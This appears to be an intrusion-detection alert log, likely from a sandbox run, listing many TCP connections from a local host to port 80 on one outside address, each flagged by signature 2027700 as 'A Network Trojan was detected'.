                              Timestamp:192.168.2.762.204.41.450265802027700 02/06/23-18:38:22.792861
                              SID:2027700
                              Source Port:50265
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449771802027700 02/06/23-18:36:09.033959
                              SID:2027700
                              Source Port:49771
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449895802027700 02/06/23-18:36:41.619813
                              SID:2027700
                              Source Port:49895
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449813802027700 02/06/23-18:36:20.733652
                              SID:2027700
                              Source Port:49813
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449805802027700 02/06/23-18:36:18.799888
                              SID:2027700
                              Source Port:49805
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450194802027700 02/06/23-18:38:04.099906
                              SID:2027700
                              Source Port:50194
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450292802027700 02/06/23-18:38:30.970171
                              SID:2027700
                              Source Port:50292
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449903802027700 02/06/23-18:36:43.538750
                              SID:2027700
                              Source Port:49903
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450096802027700 02/06/23-18:37:39.062079
                              SID:2027700
                              Source Port:50096
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449814802027700 02/06/23-18:36:20.972677
                              SID:2027700
                              Source Port:49814
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450289802027700 02/06/23-18:38:30.269170
                              SID:2027700
                              Source Port:50289
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450035802027700 02/06/23-18:37:23.185232
                              SID:2027700
                              Source Port:50035
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450068802027700 02/06/23-18:37:32.325882
                              SID:2027700
                              Source Port:50068
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450166802027700 02/06/23-18:37:57.344196
                              SID:2027700
                              Source Port:50166
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449912802027700 02/06/23-18:36:48.704071
                              SID:2027700
                              Source Port:49912
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449743802027700 02/06/23-18:36:02.235832
                              SID:2027700
                              Source Port:49743
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450010802027700 02/06/23-18:37:17.037593
                              SID:2027700
                              Source Port:50010
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450264802027700 02/06/23-18:38:22.550322
                              SID:2027700
                              Source Port:50264
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450362802027700 02/06/23-18:38:49.786551
                              SID:2027700
                              Source Port:50362
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449909802027700 02/06/23-18:36:47.991595
                              SID:2027700
                              Source Port:49909
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450335802027700 02/06/23-18:38:41.243353
                              SID:2027700
                              Source Port:50335
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449899802027700 02/06/23-18:36:42.575366
                              SID:2027700
                              Source Port:49899
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449997802027700 02/06/23-18:37:12.438413
                              SID:2027700
                              Source Port:49997
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450080802027700 02/06/23-18:37:35.199981
                              SID:2027700
                              Source Port:50080
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449870802027700 02/06/23-18:36:34.488374
                              SID:2027700
                              Source Port:49870
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450273802027700 02/06/23-18:38:25.058834
                              SID:2027700
                              Source Port:50273
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450077802027700 02/06/23-18:37:34.482978
                              SID:2027700
                              Source Port:50077
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449833802027700 02/06/23-18:36:25.603474
                              SID:2027700
                              Source Port:49833
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450007802027700 02/06/23-18:37:16.259881
                              SID:2027700
                              Source Port:50007
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449874802027700 02/06/23-18:36:36.510727
                              SID:2027700
                              Source Port:49874
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450049802027700 02/06/23-18:37:26.579536
                              SID:2027700
                              Source Port:50049
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450334802027700 02/06/23-18:38:41.003924
                              SID:2027700
                              Source Port:50334
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450363802027700 02/06/23-18:38:50.019719
                              SID:2027700
                              Source Port:50363
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449998802027700 02/06/23-18:37:12.834460
                              SID:2027700
                              Source Port:49998
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450245802027700 02/06/23-18:38:18.033800
                              SID:2027700
                              Source Port:50245
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450138802027700 02/06/23-18:37:50.675317
                              SID:2027700
                              Source Port:50138
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449744802027700 02/06/23-18:36:02.475154
                              SID:2027700
                              Source Port:49744
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449940802027700 02/06/23-18:36:57.476531
                              SID:2027700
                              Source Port:49940
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449785802027700 02/06/23-18:36:12.181176
                              SID:2027700
                              Source Port:49785
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450008802027700 02/06/23-18:37:16.510743
                              SID:2027700
                              Source Port:50008
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450204802027700 02/06/23-18:38:06.733576
                              SID:2027700
                              Source Port:50204
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450150802027700 02/06/23-18:37:53.545295
                              SID:2027700
                              Source Port:50150
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449839802027700 02/06/23-18:36:27.025983
                              SID:2027700
                              Source Port:49839
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449928802027700 02/06/23-18:36:53.692434
                              SID:2027700
                              Source Port:49928
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449969802027700 02/06/23-18:37:04.479000
                              SID:2027700
                              Source Port:49969
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450064802027700 02/06/23-18:37:30.054050
                              SID:2027700
                              Source Port:50064
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450208802027700 02/06/23-18:38:09.067569
                              SID:2027700
                              Source Port:50208
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450306802027700 02/06/23-18:38:34.417912
                              SID:2027700
                              Source Port:50306
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450162802027700 02/06/23-18:37:56.405411
                              SID:2027700
                              Source Port:50162
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450119802027700 02/06/23-18:37:44.576881
                              SID:2027700
                              Source Port:50119
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449944802027700 02/06/23-18:36:58.418493
                              SID:2027700
                              Source Port:49944
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449791802027700 02/06/23-18:36:13.602771
                              SID:2027700
                              Source Port:49791
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450220802027700 02/06/23-18:38:11.948249
                              SID:2027700
                              Source Port:50220
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450223802027700 02/06/23-18:38:12.656456
                              SID:2027700
                              Source Port:50223
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450125802027700 02/06/23-18:37:46.016414
                              SID:2027700
                              Source Port:50125
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449861802027700 02/06/23-18:36:32.032216
                              SID:2027700
                              Source Port:49861
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450217802027700 02/06/23-18:38:11.221533
                              SID:2027700
                              Source Port:50217
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449855802027700 02/06/23-18:36:30.616176
                              SID:2027700
                              Source Port:49855
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449953802027700 02/06/23-18:37:00.586145
                              SID:2027700
                              Source Port:49953
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450036802027700 02/06/23-18:37:23.421959
                              SID:2027700
                              Source Port:50036
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450134802027700 02/06/23-18:37:48.466411
                              SID:2027700
                              Source Port:50134
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449769802027700 02/06/23-18:36:08.538973
                              SID:2027700
                              Source Port:49769
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449858802027700 02/06/23-18:36:31.320590
                              SID:2027700
                              Source Port:49858
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450051802027700 02/06/23-18:37:27.043305
                              SID:2027700
                              Source Port:50051
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450181802027700 02/06/23-18:38:00.930275
                              SID:2027700
                              Source Port:50181
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450175802027700 02/06/23-18:37:59.517986
                              SID:2027700
                              Source Port:50175
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449925802027700 02/06/23-18:36:52.126736
                              SID:2027700
                              Source Port:49925
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450092802027700 02/06/23-18:37:38.122805
                              SID:2027700
                              Source Port:50092
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450319802027700 02/06/23-18:38:37.557364
                              SID:2027700
                              Source Port:50319
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449772802027700 02/06/23-18:36:09.270270
                              SID:2027700
                              Source Port:49772
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449801802027700 02/06/23-18:36:16.822547
                              SID:2027700
                              Source Port:49801
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449842802027700 02/06/23-18:36:27.765216
                              SID:2027700
                              Source Port:49842
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449972802027700 02/06/23-18:37:05.232422
                              SID:2027700
                              Source Port:49972
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450277802027700 02/06/23-18:38:27.380412
                              SID:2027700
                              Source Port:50277
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450236802027700 02/06/23-18:38:15.815189
                              SID:2027700
                              Source Port:50236
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450023802027700 02/06/23-18:37:20.267374
                              SID:2027700
                              Source Port:50023
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450147802027700 02/06/23-18:37:52.828888
                              SID:2027700
                              Source Port:50147
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449883802027700 02/06/23-18:36:38.704700
                              SID:2027700
                              Source Port:49883
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450106802027700 02/06/23-18:37:41.418242
                              SID:2027700
                              Source Port:50106
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450153802027700 02/06/23-18:37:54.264449
                              SID:2027700
                              Source Port:50153
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449788802027700 02/06/23-18:36:12.897781
                              SID:2027700
                              Source Port:49788
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449802802027700 02/06/23-18:36:18.022306
                              SID:2027700
                              Source Port:49802
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450130802027700 02/06/23-18:37:47.251536
                              SID:2027700
                              Source Port:50130
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449863802027700 02/06/23-18:36:32.512023
                              SID:2027700
                              Source Port:49863
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450225802027700 02/06/23-18:38:13.126471
                              SID:2027700
                              Source Port:50225
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450047802027700 02/06/23-18:37:26.104922
                              SID:2027700
                              Source Port:50047
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450286802027700 02/06/23-18:38:29.567763
                              SID:2027700
                              Source Port:50286
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450188802027700 02/06/23-18:38:02.626278
                              SID:2027700
                              Source Port:50188
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449976802027700 02/06/23-18:37:06.213926
                              SID:2027700
                              Source Port:49976
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450029802027700 02/06/23-18:37:21.731774
                              SID:2027700
                              Source Port:50029
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449820802027700 02/06/23-18:36:22.420698
                              SID:2027700
                              Source Port:49820
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449958802027700 02/06/23-18:37:01.789883
                              SID:2027700
                              Source Port:49958
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450258802027700 02/06/23-18:38:21.134137
                              SID:2027700
                              Source Port:50258
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450102802027700 02/06/23-18:37:40.471333
                              SID:2027700
                              Source Port:50102
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449798802027700 02/06/23-18:36:15.438757
                              SID:2027700
                              Source Port:49798
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449740802027700 02/06/23-18:36:01.508139
                              SID:2027700
                              Source Port:49740
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449891802027700 02/06/23-18:36:40.650924
                              SID:2027700
                              Source Port:49891
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449817802027700 02/06/23-18:36:21.693658
                              SID:2027700
                              Source Port:49817
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450243802027700 02/06/23-18:38:17.517772
                              SID:2027700
                              Source Port:50243
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450338802027700 02/06/23-18:38:41.974959
                              SID:2027700
                              Source Port:50338
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449835802027700 02/06/23-18:36:26.067781
                              SID:2027700
                              Source Port:49835
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450065802027700 02/06/23-18:37:30.338043
                              SID:2027700
                              Source Port:50065
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450261802027700 02/06/23-18:38:21.845480
                              SID:2027700
                              Source Port:50261
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450215802027700 02/06/23-18:38:10.750044
                              SID:2027700
                              Source Port:50215
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450083802027700 02/06/23-18:37:35.944831
                              SID:2027700
                              Source Port:50083
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450019802027700 02/06/23-18:37:19.314761
                              SID:2027700
                              Source Port:50019
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449986802027700 02/06/23-18:37:08.750839
                              SID:2027700
                              Source Port:49986
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450120802027700 02/06/23-18:37:44.810267
                              SID:2027700
                              Source Port:50120
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450014802027700 02/06/23-18:37:18.030710
                              SID:2027700
                              Source Port:50014
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449881802027700 02/06/23-18:36:38.196455
                              SID:2027700
                              Source Port:49881
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449886802027700 02/06/23-18:36:39.465156
                              SID:2027700
                              Source Port:49886
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450037802027700 02/06/23-18:37:23.652171
                              SID:2027700
                              Source Port:50037
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450055802027700 02/06/23-18:37:27.766285
                              SID:2027700
                              Source Port:50055
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450233802027700 02/06/23-18:38:15.078905
                              SID:2027700
                              Source Port:50233
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449935802027700 02/06/23-18:36:56.304075
                              SID:2027700
                              Source Port:49935
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450171802027700 02/06/23-18:37:58.553511
                              SID:2027700
                              Source Port:50171
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450202802027700 02/06/23-18:38:06.231570
                              SID:2027700
                              Source Port:50202
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450085802027700 02/06/23-18:37:36.424991
                              SID:2027700
                              Source Port:50085
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449843802027700 02/06/23-18:36:28.008839
                              SID:2027700
                              Source Port:49843
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450263802027700 02/06/23-18:38:22.311708
                              SID:2027700
                              Source Port:50263
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450248802027700 02/06/23-18:38:18.734487
                              SID:2027700
                              Source Port:50248
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450284802027700 02/06/23-18:38:29.098650
                              SID:2027700
                              Source Port:50284
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449871802027700 02/06/23-18:36:35.146966
                              SID:2027700
                              Source Port:49871
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450027802027700 02/06/23-18:37:21.251923
                              SID:2027700
                              Source Port:50027
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449757802027700 02/06/23-18:36:05.614238
                              SID:2027700
                              Source Port:49757
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449876802027700 02/06/23-18:36:37.001689
                              SID:2027700
                              Source Port:49876
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450198802027700 02/06/23-18:38:05.080347
                              SID:2027700
                              Source Port:50198
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449873802027700 02/06/23-18:36:36.003660
                              SID:2027700
                              Source Port:49873
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450024802027700 02/06/23-18:37:20.506098
                              SID:2027700
                              Source Port:50024
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450205802027700 02/06/23-18:38:07.442403
                              SID:2027700
                              Source Port:50205
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449948802027700 02/06/23-18:36:59.384504
                              SID:2027700
                              Source Port:49948
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450057802027700 02/06/23-18:37:28.262420
                              SID:2027700
                              Source Port:50057
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449729802027700 02/06/23-18:35:57.348763
                              SID:2027700
                              Source Port:49729
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449907802027700 02/06/23-18:36:47.522865
                              SID:2027700
                              Source Port:49907
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450098802027700 02/06/23-18:37:39.529541
                              SID:2027700
                              Source Port:50098
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450235802027700 02/06/23-18:38:15.569378
                              SID:2027700
                              Source Port:50235
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449830802027700 02/06/23-18:36:24.829107
                              SID:2027700
                              Source Port:49830
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449989802027700 02/06/23-18:37:09.476584
                              SID:2027700
                              Source Port:49989
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450016802027700 02/06/23-18:37:18.532774
                              SID:2027700
                              Source Port:50016
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450207802027700 02/06/23-18:38:08.630704
                              SID:2027700
                              Source Port:50207
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450276802027700 02/06/23-18:38:26.300126
                              SID:2027700
                              Source Port:50276
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449848802027700 02/06/23-18:36:28.944538
                              SID:2027700
                              Source Port:49848
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450230802027700 02/06/23-18:38:14.375521
                              SID:2027700
                              Source Port:50230
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450271802027700 02/06/23-18:38:24.266112
                              SID:2027700
                              Source Port:50271
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450100802027700 02/06/23-18:37:39.998889
                              SID:2027700
                              Source Port:50100
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449807802027700 02/06/23-18:36:19.287197
                              SID:2027700
                              Source Port:49807
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449978802027700 02/06/23-18:37:06.699430
                              SID:2027700
                              Source Port:49978
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450093802027700 02/06/23-18:37:38.357594
                              SID:2027700
                              Source Port:50093
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450129802027700 02/06/23-18:37:46.992346
                              SID:2027700
                              Source Port:50129
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.449730802027700 02/06/23-18:35:58.016249
                              SID:2027700
                              Source Port:49730
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450052802027700 02/06/23-18:37:27.283164
                              SID:2027700
                              Source Port:50052
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected
                              Timestamp:192.168.2.762.204.41.450307802027700 02/06/23-18:38:34.659310
                              SID:2027700
